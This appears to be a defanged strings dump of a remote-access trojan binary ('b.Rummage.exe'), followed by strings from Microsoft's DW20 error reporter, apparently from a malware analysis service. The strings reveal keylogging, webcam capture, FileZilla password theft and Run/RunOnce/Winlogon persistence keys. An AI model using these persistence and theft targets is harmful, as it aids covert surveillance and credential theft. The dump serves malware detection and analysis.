WindowsBuiltInRole
WindowsBuiltInRole
System.Text.RegularExpressions
System.Text.RegularExpressions
PortableExecutable
PortableExecutable
JLibrary.PortableExecutable
JLibrary.PortableExecutable
System.Globalization
System.Globalization
.ctor
.ctor
GetExecutingAssembly
GetExecutingAssembly
get_Keyboard
get_Keyboard
get_ShiftKeyDown
get_ShiftKeyDown
get_Port
get_Port
ContainsKey
ContainsKey
get_ExecutablePath
get_ExecutablePath
set_UseShellExecute
set_UseShellExecute
OpenSubKey
OpenSubKey
CreateSubKey
CreateSubKey
set_Key
set_Key
b.Rummage.exe
b.Rummage.exe
winmm.dll
winmm.dll
user32.dll
user32.dll
GetKeyboardState
GetKeyboardState
MapVirtualKey
MapVirtualKey
SetWindowsHookEx
SetWindowsHookEx
User32.dll
User32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyboardLayout
GetKeyboardLayout
kernel32.dll
kernel32.dll
ntdll.dll
ntdll.dll
advapi32.dll
advapi32.dll
.cctor
.cctor
Srclient.dll
Srclient.dll
registryKey_0
registryKey_0
wintrust.dll
wintrust.dll
SetThreadExecutionState
SetThreadExecutionState
RegOpenKeyEx
RegOpenKeyEx
tb.resources
tb.resources
ub.resources
ub.resources
b.Resources.resources
b.Resources.resources
System.Windows.Forms.Form
System.Windows.Forms.Form
My.MyProject.Forms
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
4System.Web.Services.Protocols.SoapHttpClientProtocol
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
0.0.0.0
0.0.0.0
_CorExeMain
_CorExeMain
mscoree.dll
mscoree.dll
$#%#'#(#)#*# #,#-#107686;:>=
$#%#'#(#)#*# #,#-#107686;:>=
HTTP POST
HTTP POST
hXXp://
hXXp://
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
HTTP TIMEOUT
HTTP TIMEOUT
HTTP GET
HTTP GET
HEAD / HTTP/1.1
HEAD / HTTP/1.1
POST / HTTP/1.1
POST / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
Downloaded and Executed File At:
Downloaded and Executed File At:
HTTPControl
HTTPControl
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\drivers\etc\hosts
PASSWORDS*
PASSWORDS*
Starting Remote Webcam
Starting Remote Webcam
WEBCAM*
WEBCAM*
Error Starting Remote Webcam:
Error Starting Remote Webcam:
.log.txt
.log.txt
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
httpget
httpget
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
posthttp
posthttp
Cannot Get Saved Keylogs:
Cannot Get Saved Keylogs:
Cannot Read Saved Keylog:
Cannot Read Saved Keylog:
cmd.exe
cmd.exe
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
1314591
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
CMDOn
CMDOn
CMDOff
CMDOff
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
DisableCMD
DisableCMD
SAPI.Spvoice
SAPI.Spvoice
explorer.exe
explorer.exe
csrss.exe
csrss.exe
\\.\root\default
\\.\root\default
\uTorrent\uTorrent.exe
\uTorrent\uTorrent.exe
\qBittorrent\qbittorrent.exe
\qBittorrent\qbittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\BitTorrent.exe
\BitTorrent\BitTorrent.exe
\Vuze\Azureus.exe
\Vuze\Azureus.exe
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\RunOnce
software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Specify a Password
Specify a Password
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
*Windows 8
*Windows 8
Windows 10
Windows 10
*Windows Vista
*Windows Vista
Windows 8
Windows 8
*Windows XP
*Windows XP
Windows 7
Windows 7
*Windows 10
*Windows 10
*Windows 7
*Windows 7
*Windows Server
*Windows Server
Windows
Windows
*Windows
*Windows
KEYLOGS*
KEYLOGS*
WEBCAM
WEBCAM
PASSWORDS
PASSWORDS
RESETPASSWORD
RESETPASSWORD
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
Invalid Webcam Driver Download URL, or Failed to Download File!
Invalid Webcam Driver Download URL, or Failed to Download File!
Cannot Load Webcam Driver:
Cannot Load Webcam Driver:
Opened Website:
Opened Website:
InternetExplorer.Application
InternetExplorer.Application
hXXp://cachefly.cachefly.net/5mb.test
hXXp://cachefly.cachefly.net/5mb.test
Win32_Processor.deviceid="CPU0"
Win32_Processor.deviceid="CPU0"
ms.ini
ms.ini
Invalid Password Recovery Download URL, or Failed to Download File!
Invalid Password Recovery Download URL, or Failed to Download File!
Cannot Recover Passwords. Error:
Cannot Recover Passwords. Error:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
\FileZilla\recentservers.xml
\FileZilla\recentservers.xml
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
Password
Password
Cannot Obtain Passwords:
Cannot Obtain Passwords:
vbc.exe
vbc.exe
csc.exe
csc.exe
AppLaunch.exe
AppLaunch.exe
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
explorer.exe,"
explorer.exe,"
\clientsvr.exe
\clientsvr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe,"
userinit.exe,"
clientsvr.exe
clientsvr.exe
:Zone.Identifier
:Zone.Identifier
b.Resources
b.Resources
DW20.EXE_2548:
.text
.text
`.data
`.data
.cdata
.cdata
.rsrc
.rsrc
watson.microsoft.com
watson.microsoft.com
.mdmp
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Failed to fill report params from generic params
Not offering reporting
Not offering reporting
%s Mode
%s Mode
Failed to get a reporting destination
Failed to get a reporting destination
Nothing to report from queue
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Ignoring %S due to unknown queue version
Reporting is disabled
Reporting is disabled
SignOff queue reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
Bad queue type to report from
No reports for given queue mask - %u
No reports for given queue mask - %u
Invalid queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
CreateWindowExA failed with %d.
Application Error Reporting %d
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
WatsonQueuedReportingInstanceVerification
riched20.dll
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
dwintl20.dll
Launching lightweight browser with URL
Launching lightweight browser with URL
mshtml.dll
mshtml.dll
Not reporting
Not reporting
Reporting
Reporting
DWBypassQueue
DWBypassQueue
DWExplainerURL
DWExplainerURL
DWNoSignOffQueueReporting
DWNoSignOffQueueReporting
DWAlwaysReport
DWAlwaysReport
DWReporteeName
DWReporteeName
DWURLLaunch
DWURLLaunch
DWNoExternalURL
DWNoExternalURL
DWStressReport
DWStressReport
ole32.dll
ole32.dll
imm32.dll
imm32.dll
BTLog.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXp://
hXXps://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
%s\%s
https
https
DwBTLog.log
DwBTLog.log
Failed to get minidump for %S!
Failed to get minidump for %S!
szAppName=%s
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppVer=%d.%d.%d.%d
szAppStamp=x
szAppStamp=x
szModName=%s
szModName=%s
szModVer=%d.%d.%d.%d
szModVer=%d.%d.%d.%d
szModStamp=x
szModStamp=x
fDebug=%s
fDebug=%s
offset=x
offset=x
microsoft.com
microsoft.com
.msn.com
.msn.com
.microsoft.com
.microsoft.com
d:d:d d-d-d
d:d:d d-d-d
/dw/generictwo.asp
/dw/generictwo.asp
kernel32.dll
kernel32.dll
psapi.dll
psapi.dll
mso.dll
mso.dll
MsoDWRecover%x
MsoDWRecover%x
MsoDWHang%x
MsoDWHang%x
Launching browser with URL
Launching browser with URL
shell32.dll
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
shfolder.dll
unknown.sig
unknown.sig
%s dw20.exe %d.%d.%d.%d
%s dw20.exe %d.%d.%d.%d
RegKey=
RegKey=
ResponseURL=
ResponseURL=
URLLaunch=
URLLaunch=
NoExternalURL=
NoExternalURL=
%s:(%s) XX
%s:(%s) XX
%s:(%s) X
%s:(%s) X
%s:(%s)
%s:(%s)
%s:(%s) %s
%s:(%s) %s
registry.txt
registry.txt
wql.txt
wql.txt
Windows NT Version %d.%d Build: %d
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 1 server response: %s
Stage 2 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
Stage 4 server response: %s
StatusCode: %d
StatusCode: %d
Opening server: %s
Opening server: %s
HttpOpen failed.
HttpOpen failed.
Opening %s Request:
Opening %s Request:
HTTPS
HTTPS
HttpSend Failed.
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
Failed to add heap file to cab: %S
memory.dmp
memory.dmp
mdmpmem.hdmp
mdmpmem.hdmp
version.txt
version.txt
Network reporting complete.
Network reporting complete.
Network reporting failed.
Network reporting failed.
Application Error Reporting Transfer %d
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Filesystem reporting: file tree root is too long
Record: 0xxx
Record: 0xxx
Address: 0xxx
Address: 0xxx
Code: 0xx
Code: 0xx
Flags: 0xx
Flags: 0xx
x:x
x:x
(%d.%d:%d.%d)
(%d.%d:%d.%d)
Checksum: 0xx
Checksum: 0xx
Time Stamp: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Base: 0xx
Image Size: 0xx
Image Size: 0xx
Module %d
Module %d
Windows NT %d.%d Build: %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
CPU Vendor Code: X - X - X
0xx:
0xx:
0xx: x x x x
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread ID: 0xx
Thread %d
Thread %d
Memory Range %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed queued reporting pester check
Failed to create run reg key
Failed to create run reg key
Persistent run key is set.
Persistent run key is set.
CoInitializeEx() returned 0x%x.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from SignOff Queue
Reporting from Headless Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
FAllocSD: GetLastError=%u
%s%s%s
%s%s%s
FEnsureQueueDirW: GetLastError=%u
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
SUCCESS adding report to queue
Launched (%S)
Launched (%S)
Failed to store the SensSubscription. hr: %d
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned
SENS: StringFromIID() returned
DWSHARED: SysAllocString(%s) failed!
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to query install reg key
Failed to open install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
Invalid dump type 0x%x
dbghelp.dll
dbghelp.dll
Alloc(0x%x) failed
Alloc(0x%x) failed
Thread(0x%x) will not be included
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
version.dll
ntdll.dll
ntdll.dll
%$%,%4%
%$%,%4%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
b%c%d%e%f%g%h%i%j%k%l%
!"#$%&'()* ,-./0123456789:;
!"#$%&'()* ,-./0123456789:;
!!!!2222
!!!!2222
%%%f||||
%%%f||||
!!!!2222||||
!!!!2222||||
!"#$%&'(
!"#$%&'(
'()* ,-./0
